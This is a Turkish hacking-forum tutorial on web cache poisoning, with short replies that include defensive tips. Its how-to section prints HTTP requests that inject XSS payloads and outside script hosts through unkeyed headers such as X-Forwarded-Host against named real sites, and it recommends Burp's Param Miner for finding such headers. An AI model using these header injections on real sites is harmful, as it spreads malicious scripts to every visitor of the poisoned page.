THT DUYURU


Web & Server Güvenliği ve Zafiyetler Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini defansif ve ofansif yönleri ile bu bölümdeki konularla öğrenebilirsiniz.

Seçenekler

Web önbellegi zehirlenmesi Nedir Nasıl Yapılır ? ( Web cache poisoning )

JİTEM - ait Kullanıcı Resmi (Avatar)
Anka Red Team Editör Asistanı
Üyelik tarihi:
05/2020
Nereden:
KATO DAĞI
Mesajlar:
930
Konular:
63
Teşekkür (Etti):
238
Teşekkür (Aldı):
683
Ticaret:
(0) %
14
444
bir Hafta önce
#1










Herkese Selam değerli TurkHackTeam Ailesi bu konumda sizlere web önbellegi zehirlenmesi nedir nasıl yapılır bundan bahsedeceğim ilgisi olanlara faydalı olması dilegim ile.









1-)Web Önbellegi ( Cache ) Nedir ?:
Bizler googlede yada herhangi bir arama motorunda bir sayfayı ilk açtıgımızda biraz yavaş açılabilir fakar 2.kez girdigimizde sayfa daha hızlı açılır bunun sebebi ise tabiki önbellektir ingilizcesi ( Cache ) olan bu arkadaşımız bu gibi bazı durumlarda bize yardımcı oluyor en son yaptıgınız işlemleri depolayarak degerlendirerek bi sonraki işlemlerimizi tahmin ederekte hızlandıra biliyor. Bu sebepten dolayı önbellegimiz arama motorları, mobil uygulamalar vb şeyler server ile önbellek arasında gerçekleşir. Web Önbellek Zehirlenmesini anlaya bilmemiz için bu mantıgı kavramamız gerekmektedir.









2-)Önbellek Anahtarları ( Cache Keys ):
Önbellek bir HTTP istegi aldıgı zaman, öncesinde önbellege alınmış bir istek olup olmadıgını veya arka uç sunucu tarafından iletilmesi gerekip gerekmediğini belirlemelidir. Önbellek anahtarları olarak bilinen istegin bileşenlerinin önceden tanımlanmış bir alt kümesini karşılaştırarak eşdeger istekleri tanımlar. Genellikle bu istek Önbellek anahtarında bulunmayan istek bileşenlerinin anahtarlanmamış oldugunu söyler











3-)Web Önbellek Zehirlenmesi Nedir? :
Web önbellek zehirlenmesi, bir saldırganın bir web sunucusunun ve önbelleğin davranışını kullanarak diğer kullanıcılara zararlı bir HTTP yanıtının sunulmasını sağlayan gelişmiş bir tekniktir. Temel olarak, web önbellek zehirlenmesi iki aşamadan oluşur. İlk olarak, saldırganın, yanlışlıkla bir tür tehlikeli yük içeren arka uç sunucudan nasıl bir yanıt alacağını bulması gerekir. Başarılı olduklarında, yanıtlarının önbelleğe alındığından ve ardından amaçlanan kurbanlara sunulduğundan emin olmaları gerekir. Zehirlenmiş bir web önbelleği, potansiyel olarak çok sayıda farklı saldırıyı dağıtmanın, XSS , JavaScript enjeksiyonu, açık yeniden yönlendirme gibi güvenlik açıklarından yararlanmanın yıkıcı bir yolu olabilir.









4-)Web Önbellek Zehirlenmesi Nasıl Yapılır?:


1.Basit Zehirleme;


Kod:
GET /en?cb=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<**** property="og:image" content="https://canary/cms/social.png" />
Yukarıdaki bellirtigim kod kısmında X-Forwarded-Host başlıgının uygulama tarafından bir **** etiket içinde bir Açık Grafik URLsi yapılması için kullanıldıgını görebiliriz. Şimdi ise yapmamız gereken bunun istismar edilebilir olup olmadıgını araştırmaktır - basit bir siteler arası komut dosyası yüklemesi ile başlayacagız

Kod:
            
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>

HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<**** property="og:image" content="https://a."><script>alert(1)</script>"/>
XSS kodlarından biri ile çalıştırarak bir yanıt alabilecegimizi gördügümüze göre devam edelim. Son adım, bu yanıtın diger kullanıcılara teslim edilmesi için bir önbellekte saklanıp saklanmadıgını kontrol etmektir. ( Önbellek Denetimi: önbelleksiz başlıgının ) sizi vazgeçirmesine izin vermeyiniz. Önce isteği kötü amaçlı başlık olmadan yeniden göndererek ve ardından URLsini dogrudan farklı bir makinedeki bir tarayıcıdan getirerek dogrulayabilirsiniz

Kod:
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com

HTTP/1.1 200 OK
…
<**** property="og:image" content="https://a."><script>alert(1)</script>"/>
Yanıtımızda bir önbellegin mevcut oldugunu gösteren herhangi bir başlık olmasa da açıgımız açık bu şekilde önbellege alındı.


2.Gizli Zehirleme;

Sitenin ana sayfasını gerçekten zehirlemek ve istismarımızı sonrasında gelen tüm ziyaretçilere sunabilmek için, önbellege yanıt aldıktan sonra ilk isteği ana sayfaya gönderdiğimizden emin olmamız gerekir. Bunuda. Burp Intruder gibi bir araç veya çok sayıda istek göndermek için özel bir komut dosyası kullanılarak deneyebiliriz fakat aşırı yogun trafikli bir yaklaşım pek iyi sonuçlar çıkarmaya bilir işlerimizi uzatabilir.

Kod:
GET / HTTP/1.1
Host: unity3d.com
X-Host: portswigger-labs.net

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800
…
<script src="https://portswigger-labs.net/sites/files/foo.js"></script>

3.Seçili Zehirleme;

HTTP başlıklarının önbelleklerin içindeki işleyişi ile ilgili zaman kazandırabilir. Fastly kullanan ve isimlendirilemeyen aşagıdaki web sayfasını inceleyelim


Kod:
GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 … Firefox/60.0
X-Forwarded-Host: a"><iframe onload=alert(1)>

HTTP/1.1 200 OK
X-Served-By: cache-lhr6335-LHR
Vary: User-Agent, Accept-Encoding
…
<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
</iframe>

4.Dahili Önbellek Zehirlemesi;

Aşagıda Belirtecegim code kısmındaki istekle Adobe blogunda olası bir önbellek zehirlenmesi sorunu varmı yokmu diye baktıktan sonra Burp Collaborator aracılıgı sayesinde web sayfasının hemen hemen çogu yerinden gelen uzun süreli bir trafik akışı alacagız

Kod:
GET /access-the-power-of-adobe-acrobat?dontpoisoneveryone=1 HTTP/1.1
Host: theblog.adobe.com
X-Forwarded-Host: collaborator-id.psres.net
Kod:
GET / HTTP/1.1
Host: theblog.adobe.com

HTTP/1.1 200 OK
X-Cache: HIT - WP Rocket Cache
...
<script src="https://collaborator-id.psres.net/foo.js"/>
...
<a href="https://collaborator-id.psres.net/post">…

5.Param Miner;

Burp Suite Param Miner uzantısını ekleyerek anahtarlanmamış girdileri tanımlama sürecini otomatikleştirebilirsiniz . Param Miner'ı kullanmak için, araştırmak istediginiz bir istege sag tıklayın ve 'Guess headers' kısmına tıklayın. Param Miner daha sonra arka planda çalışır ve kapsamlı, yerleşik başlık listesinden farklı girdiler içeren istekler gönderir. Eklenen girdilerinden birini içeren bir istegin yanıt üzerinde bir etkisi varsa, Param Miner bunu Burp Suite Professional kullanıyorsanız 'Issues' bölmesinde veya uzantının (' Output 'kısmındaki ) günlüge kaydeder. Extender > Extensions > Param Miner > Output

Örnegin aşagıdaki ekran görüntüsünde Param Miner X-Forwarded-Host web sayfasının ana sayfasında anahtarsız bir başlık buldu








5-)Verilen Hasarlar Neler Olabilir Ne Kadar Büyük Olabilir? :

Saldırımızda zehirli önbellek bagımsız bir saldırıdan daha çok bir dagıtım aracı oldugundan web önbellek zehirlenmesinin etkisi enjekte edilen yükün ne kadar zararlı oldugu ile ayrılmaz bir şekilde baglantılıdır. Bu saldırı türünü diğer saldırılarımızı desteklemek için beraberinde kullanabiliriz. Zehirli yanıt yalnızca önbellek zehirlendiginde etkilenen sayfayı ziyaret eden insanlara sunulacaktır. Sonuç olarak sayfanın popüler olup olmamasına baglı olarak etki yoktan büyük boyuta kadar değişebilir.



Evet degerli TurkHackTeam Ailesi bu konumda sizlere web önbellegi zehirlenmesi nedir ve nasıl yapılır adlı konumuzu anlatmaya çalıştım umarım anlaşılır bir dilde anlatmışımdır.




İYİ FORUMLAR İYİ EĞLENCELER İYİ ŞANSLAR


















---------------------
Benim Kudretimin Ulaştıgı Yerlere Onların Hayalleri Bile Ulaşamaz


Twitter: JitemTHT
Discord: Hakan#0666
Telegram: JitemTHT
Konu JİTEM tarafından (bir Hafta önce Saat 15:24 ) değiştirilmiştir.
Ghost Killer - ait Kullanıcı Resmi (Avatar)
Anka Red Team Junior
Üyelik tarihi:
01/2019
Nereden:
Mesajlar:
5.343
Konular:
153
Teşekkür (Etti):
134
Teşekkür (Aldı):
2619
Ticaret:
(0) %
bir Hafta önce
#2
eline sağlık .
---------------------
𐰤𐰀:𐰢𐰆𐱃𐰞𐰆:𐱅𐰇𐰼𐰜𐰢:𐰓𐰃𐰘𐰤𐰀
By Neferian Teşekkür etti.
MCO Artz - ait Kullanıcı Resmi (Avatar)
Grafiker
Üyelik tarihi:
11/2019
Nereden:
Kırgızistan
Mesajlar:
194
Konular:
45
Teşekkür (Etti):
133
Teşekkür (Aldı):
249
Ticaret:
(0) %
bir Hafta önce
#3
Eline sağlık çok güzel, yararlı konu.
---------------------
MCO Arts
Draw your life beautifully.

Telegram: mcoarts Behance: mcoarts Instagram: mco_arts

"Türkiye Cumhuriyeti Kıymetli Evlatlarının Elinde Ebediyen Yaşayacaktır."

kurtdereli - ait Kullanıcı Resmi (Avatar)
Basın & Medya Ekibi
Üyelik tarihi:
07/2020
Nereden:
-Türkistan-
Yaş:
12
Mesajlar:
930
Konular:
157
Teşekkür (Etti):
657
Teşekkür (Aldı):
561
Ticaret:
(0) %
bir Hafta önce
#4
eline emeğine sağlık abi.
--------------------- İletişim için
Twitter: KurtdereliTht
İnstagram: tht.kurtdereli
Telegram: thtkurt
SELAM SANA
EY YILLARI HEBA OLAN GENÇ!
Khanctor - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
İndex
Mesajlar:
86
Konular:
10
Teşekkür (Etti):
30
Teşekkür (Aldı):
34
Ticaret:
(0) %
bir Hafta önce
#5
Eline, emeğine sağlık. Gayet faydalı bir konu olmuş
Eronmay - ait Kullanıcı Resmi (Avatar)
Haftanın Deneyimli Moderatörü
Üyelik tarihi:
07/2016
Nereden:
Kader
Mesajlar:
4.559
Konular:
634
Teşekkür (Etti):
633
Teşekkür (Aldı):
1407
Ticaret:
(0) %
bir Hafta önce
#6
Eline sağlık, güzel konu .
---------------------
EYLL' - ait Kullanıcı Resmi (Avatar)
Anka Red Team Junior
Üyelik tarihi:
05/2019
Nereden:
/etc/shadow
Yaş:
1
Mesajlar:
1.377
Konular:
174
Teşekkür (Etti):
490
Teşekkür (Aldı):
725
Ticaret:
(0) %
bir Hafta önce
#7
Eline sağlık abi
---------------------
Hiçbir Uyuşturucu Seni Aklımdan Çıkaramaz.

EYLL



The Golge - ait Kullanıcı Resmi (Avatar)
Anka Red Team Junior
Üyelik tarihi:
05/2019
Nereden:
Gölge Diyarı
Mesajlar:
134
Konular:
18
Teşekkür (Etti):
249
Teşekkür (Aldı):
131
Ticaret:
(0) %
bir Hafta önce
#8
Eline emeğine sağlık gardaşım her zamanki gibi efsane ve bilgilendiri olmuş.
---------------------
whatamnotsaying - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
03/2020
Mesajlar:
411
Konular:
47
Teşekkür (Etti):
232
Teşekkür (Aldı):
148
Ticaret:
(0) %
bir Hafta önce
#9
Site Ziyaretçisi Olarak:
Noscript eklentisini kullanarak sadece belli başlı sitelerin script çalıştırmasını izin vererek bu ve bir çok saldırıyı biraz da olsun engelleyebilirsiniz.

Site Web Masterı Olarak:
https://support.cloudflare.com/hc/en...soning-Attacks şuradan bilgi edinebilirsiniz.

Elinize sağlık
JİTEM - ait Kullanıcı Resmi (Avatar)
Anka Red Team Editör Asistanı
Üyelik tarihi:
05/2020
Nereden:
KATO DAĞI
Mesajlar:
930
Konular:
63
Teşekkür (Etti):
238
Teşekkür (Aldı):
683
Ticaret:
(0) %
bir Hafta önce
#10
Alıntı:
whatamnotsaying´isimli üyeden Alıntı Mesajı göster
Site Ziyaretçisi Olarak:
Noscript eklentisini kullanarak sadece belli başlı sitelerin script çalıştırmasını izin vererek bu ve bir çok saldırıyı biraz da olsun engelleyebilirsiniz.

Site Web Masterı Olarak:
https://support.cloudflare.com/hc/en...soning-Attacks şuradan bilgi edinebilirsiniz.

Elinize sağlık

Bilgilendirme için teşekkürler dostum
---------------------
Benim Kudretimin Ulaştıgı Yerlere Onların Hayalleri Bile Ulaşamaz


Twitter: JitemTHT
Discord: Hakan#0666
Telegram: JitemTHT

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler